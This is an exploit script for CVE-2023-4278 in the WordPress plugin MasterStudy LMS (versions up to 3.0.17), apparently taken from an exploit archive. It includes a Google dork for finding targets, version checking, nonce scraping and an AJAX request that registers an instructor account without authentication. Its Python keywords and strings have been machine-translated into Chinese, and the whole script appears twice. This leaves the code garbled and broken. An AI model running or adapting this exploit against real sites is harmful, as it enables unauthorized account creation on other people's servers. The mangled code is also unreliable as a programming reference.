#利用title: WordPress插件Masterstudy LMS -3.0.17-未经身份验证的讲师帐户创建
#Google Dork: inurl:/用户- 公共账户
#日期: 2023-09-04
#利用作者: Revan Arifio
#供应商HomePage: HTTPS:/.org/.org/插件/MasterStudy-LMS学习管理系统/
#版本:=3.0.17
#在: Windows,Linux上测试
#CVE : CVE-2023-4278
导入请求
导入操作系统
导入
进口时间
横幅='''
______________ __ __ __ __ __ ___ _____ _____ _____
/__ \ \ \//__ | | __ \/_ \ _ \ | || | __ \ _/_ \
| | \ \//| | __ _______)| | | | | | )| )| ___ | || | )|//()|
| | \ \//| __ | _______//| | | | | |//| __ ______________ /////
| | _____ \/| | __//_ | | _ |//_ _)| | |/////| ()|
\ ______ | \/| _______ | | _____/_________ | _____/| _ | _____ //\ ____/
====================================================================================================================================================
||标题: Masterstudy LMS=3.0.17-未经身份定制的教师帐户创建||
||作者: https://github.com/revan-ar ||
||供应商主页: https:/wordpress.org/plugins/masterstudy-lms-lms-learning-enagement-system/||
||支持: https://www.buymeacoffee.com/revan.ar ||
====================================================================================================================================================
'''
印刷(横幅)
#获取nonce
def get_nonce(target):
open_target=requests.get('{}/user-public-account'.format(target))
search_nonce=re.search(''stm_lms_register':'(。*?)'',open_target.text)
如果search_nonce [1]!=none:
返回search_nonce [1]
其他:
打印(“获取Nonce
时失败”)
#特权升级
DEF PRIVESC(目标,NONCE,用户名,密码,电子邮件):
req_data={
'user_login':'{}'。格式(用户名),
'user_email':'{}'。格式(电子邮件),
'user_password':'{}'。格式(密码),
'user_password_re':'{}'。格式(密码),
'susty_instructor':true,
'privacy_policy':true,
':'',
':'',
“听觉” :'',
'额外的: [],
'after_instructors': [],
'profile_default_fields_for_register': [],
'redirect_page':'{}/user-account/'。格式(target)
}
start=requests.post('{}/wp-admin/admin-ajax.php?action=stm_lms_registternOnce={}'。格式(target,nonce),json=req_data)
如果start.status_code==200:
打印('[+]利用成功!')
其他:
打印('[+]漏洞失败')
#URL目标
target=输入('[+] url target:')
打印('[+]启动利用')
plugin_check=requests.get('{}/wp-content/plugins/masterstudy-lms-learning-enagement-system/readme.txt'.format(target))
plugin_version=re.search('稳定tag:(。+)',plugin_check.text)
int_version=plugin_version [1] .replace('。','')
时间。
如果int(int_version)3018:
打印('[+]目标是脆弱的!')
#凭据
电子邮件=输入('[+]电子邮件:')
用户名=输入('[+] username:')
密码=输入('[+]密码:')
时间。
打印('[+]获得nonce .')
get_nonce=get_nonce(target)
#获取nonce
如果get_nonce!=none:
print('[+]成功获取nonce: {}'。格式(get_nonce))
时间。
#启动Privesc
PRIVESC(target,get_nonce,用户名,密码,电子邮件)
#--------------------------------------------------
其他:
print('[+]目标不易受伤害')
#Google Dork: inurl:/用户- 公共账户
#日期: 2023-09-04
#利用作者: Revan Arifio
#供应商HomePage: HTTPS:/.org/.org/插件/MasterStudy-LMS学习管理系统/
#版本:=3.0.17
#在: Windows,Linux上测试
#CVE : CVE-2023-4278
导入请求
导入操作系统
导入
进口时间
横幅='''
______________ __ __ __ __ __ ___ _____ _____ _____
/__ \ \ \//__ | | __ \/_ \ _ \ | || | __ \ _/_ \
| | \ \//| | __ _______)| | | | | | )| )| ___ | || | )|//()|
| | \ \//| __ | _______//| | | | | |//| __ ______________ /////
| | _____ \/| | __//_ | | _ |//_ _)| | |/////| ()|
\ ______ | \/| _______ | | _____/_________ | _____/| _ | _____ //\ ____/
====================================================================================================================================================
||标题: Masterstudy LMS=3.0.17-未经身份定制的教师帐户创建||
||作者: https://github.com/revan-ar ||
||供应商主页: https:/wordpress.org/plugins/masterstudy-lms-lms-learning-enagement-system/||
||支持: https://www.buymeacoffee.com/revan.ar ||
====================================================================================================================================================
'''
印刷(横幅)
#获取nonce
def get_nonce(target):
open_target=requests.get('{}/user-public-account'.format(target))
search_nonce=re.search(''stm_lms_register':'(。*?)'',open_target.text)
如果search_nonce [1]!=none:
返回search_nonce [1]
其他:
打印(“获取Nonce
时失败”)#特权升级
DEF PRIVESC(目标,NONCE,用户名,密码,电子邮件):
req_data={
'user_login':'{}'。格式(用户名),
'user_email':'{}'。格式(电子邮件),
'user_password':'{}'。格式(密码),
'user_password_re':'{}'。格式(密码),
'susty_instructor':true,
'privacy_policy':true,
':'',
':'',
“听觉” :'',
'额外的: [],
'after_instructors': [],
'profile_default_fields_for_register': [],
'redirect_page':'{}/user-account/'。格式(target)
}
start=requests.post('{}/wp-admin/admin-ajax.php?action=stm_lms_registternOnce={}'。格式(target,nonce),json=req_data)
如果start.status_code==200:
打印('[+]利用成功!')
其他:
打印('[+]漏洞失败
')#URL目标
target=输入('[+] url target:')
打印('[+]启动利用')
plugin_check=requests.get('{}/wp-content/plugins/masterstudy-lms-learning-enagement-system/readme.txt'.format(target))
plugin_version=re.search('稳定tag:(。+)',plugin_check.text)
int_version=plugin_version [1] .replace('。','')
时间。
如果int(int_version)3018:
打印('[+]目标是脆弱的!')
#凭据
电子邮件=输入('[+]电子邮件:')
用户名=输入('[+] username:')
密码=输入('[+]密码:')
时间。
打印('[+]获得nonce .')
get_nonce=get_nonce(target)
#获取nonce
如果get_nonce!=none:
print('[+]成功获取nonce: {}'。格式(get_nonce))
时间。
#启动Privesc
PRIVESC(target,get_nonce,用户名,密码,电子邮件)
#--------------------------------------------------
其他:
print('[+]目标不易受伤害
')